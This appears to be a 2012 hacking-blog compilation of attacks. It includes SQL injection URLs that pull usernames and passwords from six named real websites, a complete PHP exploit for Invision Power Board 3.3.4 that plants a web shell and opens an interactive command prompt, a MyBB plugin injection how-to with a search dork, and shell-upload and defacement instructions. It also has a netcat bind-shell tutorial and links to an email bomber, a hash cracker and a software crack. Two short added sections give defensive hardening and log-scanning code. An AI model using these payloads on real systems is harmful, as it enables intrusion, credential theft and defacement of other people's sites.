Dec 1, 2012


6 Random Injections


1/

Code:
http://www.elansystems.co.za/product-item.php?product_items_id=-11 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,group_concat(username,​0x3b,password),5,6,7,8,9,10 from users_tbl--



2/

Code:
http://www.nbjm-sprayer.com/products.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(username,0x3b,password),18,1​9,20,21,22,23 from user_table--

3/

Code:
http://www.mcdonaldlawoffice.net/story.php?articleid=-8 UNION SELECT 1,2,group_concat(name,0x3b,password),4,5,6,7,8,9,10,11,12,13,14,15,16 from users--

4/

Code:
http://localtime.biz/product.php?cat_id=-1 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(email,0x3b,​pwd,0x3c,0x62,0x72,0x3e),4 from users--

5/

Code:
http://www.eltee.de/kolumnen_id.php?id=-30175 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8--

6/

Code:
http://www.media4world.de/mini_d/list_art.php?shop=-5 UNION SELECT group_concat(username,0x3b,kwort,0x3b,admin,0x3c,0x62,0x72,0x3e) from user--

[TUT] SQL in HTML format


Link Download
http://www.mediafire.com/?6hh2ykae8xpuq2q

Or
https://www.box.com/s/3m0xluf10xdhcdw95qzu

kakavn

Top domestic sites vulnerable to SQL injection, checked 23/11/2012



WordPress WP E-Commerce 3.8.9 SQL Injection / Cross Site Scripting



Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution


<?php
/*
----------------------------------------------------------------
Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution
----------------------------------------------------------------

author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: http://www.invisionpower.com/

+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only.    |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+

[-] Vulnerable code in IPSCookie::get() method defined in /admin/sources/base/core.php

4015.    static public function get($name)
4016.    {
4017.        // Check internal data first
4018.        if ( isset( self::$_cookiesSet[ $name ] ) )
4019.        {
4020.            return self::$_cookiesSet[ $name ];
4021.        }
4022.        else if ( isset( $_COOKIE[ipsRegistry::$settings['cookie_id'].$name] ) )
4023.        {
4024.            $_value = $_COOKIE[ ipsRegistry::$settings['cookie_id'].$name ];
4025.
4026.            if ( substr( $_value, 0, 2 ) == 'a:' )
4027.            {
4028.                return unserialize( stripslashes( urldecode( $_value ) ) );
4029.            }

The vulnerability is caused due to this method unserialize user input passed through cookies without a proper sanitization. The only one check is done at line 4026, where is controlled that the serialized string starts with 'a:', but this is not sufficient to prevent a "PHP Object Injection" because an attacker may send a serialized string which represents an array of objects. This can be exploited to execute arbitrary PHP code via the "__destruct()" method of the "dbMain" class, which calls the "writeDebugLog" method to write debug info into a file. PHP code may be injected only through the $_SERVER['QUERY_STRING'] variable, for this reason successful exploitation of this vulnerability requires short_open_tag to be enabled.

[-] Disclosure timeline: [21/10/2012] - Vulnerability discovered [23/10/2012] - Vendor notified [25/10/2012] - Patch released: http://community.invisionpower.com/t...ecurity-update [25/10/2012] - CVE number requested [29/10/2012] - Assigned CVE-2012-5692 [31/10/2012] - Public disclosure */ error_reporting(0); set_time_limit(0); ini_set('default_socket_timeout', 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } print "\n+---------------------------------------------------------------------+"; print "\n| Invision Power Board <= 3.3.4 Remote Code Execution Exploit by EgiX |"; print "\n+---------------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /ipb/\n"; die(); } list($host, $path) = array($argv[1], $argv[2]); $packet = "GET {$path}index.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; $_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? 
$m[1] : ''; class db_driver_mysql { public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php'); } $payload = urlencode(serialize(array(new db_driver_mysql))); $phpcode = '<?error_reporting(0);print(___);passthru(base64_d ecode($_SERVER[HTTP_CMD]));die;?>'; $packet = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: {$_prefix}member_id={$payload}\r\n"; $packet .= "Connection: close\r\n\r\n"; http_send($host, $packet); $packet = "GET {$path}cache/sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; if (preg_match('/<\?error/', http_send($host, $packet))) die("\n[-] short_open_tag disabled!\n"); while(1) { print "\nipb-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }
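
For defenders, an added example (not IPB code and not part of the original advisory) of why the 'a:' prefix check at line 4026 is insufficient and how a cookie getter can refuse object revival. DebugLogger, cookie_get_unsafe, cookie_get_safe and contains_object are hypothetical names, the cookie value is constructed, and the hardened variant assumes PHP 7.0 or later for the allowed_classes option.

```php
<?php
// Added illustration, not IPB source. DebugLogger and the cookie_get_* helpers are hypothetical.
class DebugLogger // stand-in for any class whose destructor acts on its own properties
{
    public $obj = array('use_debug_log' => 0, 'debug_log' => '');
    public static $writes = array(); // records what a real destructor would have written
    public function __destruct()
    {
        if (!empty($this->obj['use_debug_log'])) {
            self::$writes[] = $this->obj['debug_log'];
        }
    }
}

// Same logic as the quoted lines 4026-4028: only the 'a:' prefix is checked.
function cookie_get_unsafe($raw)
{
    $value = stripslashes(urldecode($raw));
    return substr($value, 0, 2) == 'a:' ? unserialize($value) : $value;
}

// True if the value, or any element at any depth, is an object or incomplete-class placeholder.
function contains_object($value)
{
    if (!is_array($value)) {
        return is_object($value) || $value instanceof __PHP_Incomplete_Class;
    }
    return (bool) array_filter($value, 'contains_object');
}

// Hardened variant (PHP 7.0+): never instantiate classes, reject arrays that asked for one.
function cookie_get_safe($raw)
{
    $value = stripslashes(urldecode($raw));
    if (substr($value, 0, 2) !== 'a:') {
        return $value;
    }
    $data = @unserialize($value, array('allowed_classes' => false));
    return (is_array($data) && !contains_object($data)) ? $data : null;
}

// Constructed sample cookie: a serialized array holding one object with chosen properties.
$cookie = urlencode('a:1:{i:0;O:11:"DebugLogger":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:17:"cache/example.txt";}}}');

cookie_get_unsafe($cookie);          // the object is revived, then destroyed: __destruct() runs
var_dump(DebugLogger::$writes);      // what the destructor acted on
DebugLogger::$writes = array();
var_dump(cookie_get_safe($cookie));  // hardened getter's result for the same cookie
var_dump(DebugLogger::$writes);      // destructor activity after the hardened call
```

Storing cookie arrays as JSON (json_encode / json_decode) avoids unserialize() on client input altogether and also works on PHP versions that predate allowed_classes.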


MyBB Profile Albums Plugin 0.9 (albums.php, album parameter) SQL Injection

A bug for forums running MyBB with the Albums plugin, version 0.9.
Tut:
1. Create a user on the victim forum.
2. Create an album and upload an image.
-> The two steps above give you the user ID and the album ID used in step 3.

3. Enter the user ID as Valid_ID and the album ID as Valid_album_ID, then append the SQL exploitation statement at the end.
link: .../albums.php?action=editimage&image=[Vaild_ID]&album=[Vaild_album_ID][SQLi]
# Exploit Title: Profile Albums MyBB plugin SQL Injection 0day
# Google Dork: inurl:albums.php intext:"powered by Mybb"
# Date: 14.10.2012
# Exploit Author: Th3FreakPony
# Software Link: http://mods.mybb.com/view/profilealbums
# Version: 0.9
# Tested on: Linux.
----------------------------------------------

The vulnerability exists within albums.php:

input['album'];
/*Line 86*/ $query_add_breadcrumb = $db->simple_select("albums", "*", "aid='".$aid."'");
?>

/albums.php?action=editimage&image=[Vaild_ID]&album=[Vaild_album_ID][SQLi]

(You need to create a new account && upload album and images)
----------------------------------------------
Image : http://i.imgur.com/yeAx0.png


Follow: https://twitter.com/PonyBlaze


Source: http://junookyo.blogspot.com/2012/11/mybb-profile-albums-plugin-09-albumsphp.html
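
The line 86 query above concatenates the `album` value straight into the WHERE clause. The following added example (not the plugin's code and not from the advisory) validates the ID before any SQL is built and flags requests in an access log that sent a non-integer `album` or `image` value. It assumes both IDs are plain integers; parse_id, album_where_clause, flag_album_requests and the log lines are constructed for illustration.

```php
<?php
// Added example, not plugin code. Function names and log lines are constructed for illustration.

// Strict parser for ID parameters such as `album` and `image` (assumed to be integers):
// returns the integer, or null for anything other than 1-9 decimal digits.
function parse_id($raw)
{
    return (is_string($raw) && preg_match('/^[0-9]{1,9}$/D', $raw)) ? (int) $raw : null;
}

// The same parser applied where the plugin reads the parameter: reject before building SQL.
function album_where_clause($raw)
{
    $aid = parse_id($raw);
    return $aid === null ? null : "aid='" . $aid . "'";
}

// Returns one hit per albums.php request whose `album` or `image` value is not a plain integer.
function flag_album_requests(array $lines)
{
    $hits = array();
    foreach ($lines as $line) {
        if (!preg_match('#"(?:GET|POST) \S*albums\.php\?(\S*) HTTP#', $line, $m)) {
            continue;
        }
        parse_str($m[1], $params); // parse_str URL-decodes the values
        foreach (array('album', 'image') as $key) {
            if (isset($params[$key]) && parse_id($params[$key]) === null) {
                $shown = is_array($params[$key]) ? '[array]' : $params[$key];
                $hits[] = array('param' => $key, 'value' => $shown, 'line' => $line);
            }
        }
    }
    return $hits;
}

// Constructed sample access-log lines (documentation-range addresses).
$log = array(
    '192.0.2.10 - - [14/Oct/2012:10:00:01 +0000] "GET /albums.php?action=editimage&image=12&album=7 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [14/Oct/2012:10:00:09 +0000] "GET /albums.php?action=editimage&image=12&album=7%27%20OR%20%271 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [14/Oct/2012:10:00:15 +0000] "GET /index.php HTTP/1.1" 200 900',
);

foreach (flag_album_requests($log) as $hit) {
    printf("non-numeric %s=%s\n", $hit['param'], $hit['value']);
}
var_dump(album_where_clause('7'));        // clause built from a validated integer
var_dump(album_where_clause("7' OR '1")); // rejected before any SQL is built
```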
Puzzles to Test your Hacking Skills



Hello Friends,
Many readers of my site want to be hackers, and by now of course you have learnt many things. So now it's time to check your hacking skills.

Here I am providing links to some sites where you can test your hacking skills just by solving puzzles. It's really very interesting, and I am sure that by solving these puzzles you will gain some more knowledge too. On these sites the puzzles are arranged in many levels from easy to hard, so how good a hacker you are depends on how many levels you clear.

So here are links to 4 top sites. Try them, they are fun and challenging :) And share your results and experience here :)

  1. http://www.try2hack.nl/
  2. http://www.hack-test.com/index.htm
  3. http://www.elfqrin.com/hack/hackertest.html
  4. http://www.hackthissite.org/


"Testing Image collection" shell and files upload vulnerability

Dorks : inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
           intitle:"Testing Image Collections"


Goto Google or Bing and Type Dork  inurl:"modules/filemanagermodule/actions/?picker.php??id=0" or intitle:"Testing Image Collections"
now see search results in google or bing search ..
select any site from search results and look for upload option

Now select your shell or deface page and upload it

To view your upload shell or deface go to:
http://website.com/files/yourfilehere  or
http://websites.com/path/yourfilehere

Example -
http://www.dogandduckfc.com/newsite/modules/filemanagermodule/actions/picker.php?id=0

Source: http://junookyo.blogspot.com/2012/12/testing-image-collection-shell-and.html
Email Bomber aka Mass Mailer


http://pastebin.com/qegBLu97 
CK Hash Cracker


CK_HASH_CRACKER VERSION 3.0 Download Link: Click Here

__Change Log__
Hash Identifier Modified
Online Database Checker Bug Fixed And Works Faster
Offline Database Search Engine Modified
Rainbow Table Algorithm Added

How To Add Additional Database Release?

After Installation with the Default Settings, A Folder Named CK_Hash_Cracker Verion 3.0 will be Created in Root Directory/Program Files, which is mostly C: Drive, So that path will Be C:\Program Files\CK_Hash_Cracker-Version 3.0; under This Folder There Are Two Folders Named "Brute" And "DatabaseConnector"

Files Under "Brute" Folder Is Used For BruteForcing, Make Sure If You Place Additional WordList, You Do Not Have Duplicate Words, Otherwise It will just increase the Time. You Can Place Files With Any Name Under This Folder, It Will Work Fine, until the Files Are in Readable Format

Files Under "DatabaseConnector" Are The Offline Database, So For Any Database Releases, After Downloading Databases, Put The Files Under "DatabaseConnector" Folder And That's It, The Tool Will Automatically Upgrade The Database.

It Has A Self-Installer, So To Install, Just Run The Setup file. To Uninstall, You Can Remove It From Control Panel Or From The Self Uninstaller.

If You Get Error At Run-Time, Probably You Do Not Have The Microsoft Visual C++ 2008 Installed, The Application doesn't need Python To Run, But It Needs The Run-Time Components. You Get The Download Packages From Here:

For Windows 32 bit: Click Here

For Windows 64 bit: Click Here

And Then Try Running The Application.
CK_Hash_Cracker (Version 3.0) Download Link: Click Here

Source: http://junookyo.blogspot.com/2012/12/ck-hash-cracker.html

Tutorial: How Crack IDM

Link download:
https://www.box.com/shared/codrpymlce
Tutorial by Lovepascal (2007).
Bug script WordPress SQL Injection version 3.1.3


Exploits links here


[Tutorial]Backconnect with netcat

1.Download

netcat windows-http://anonym.to/?http://joncraton.o...at-for-windows
nc to upload with shell-http://www.multiupload.nl/TOBD6TAOXE

2.Upload nc with shell

3.set chmod 777 for nc



4.run command ./nc -vv -l -p [port] -e /bin/bash at shell


5.open cmd direct to where nc save like this cd c:\
and run this command 
nc -vv [ip target] [port]





6.now you have back connect it

[Video TUT] Remote Code Execution vBulletin 4.1.10 Exploit


Greetings:Pirjo(iranian black hat hacker),Team openfire,Team INTRA,team injectors and all hackers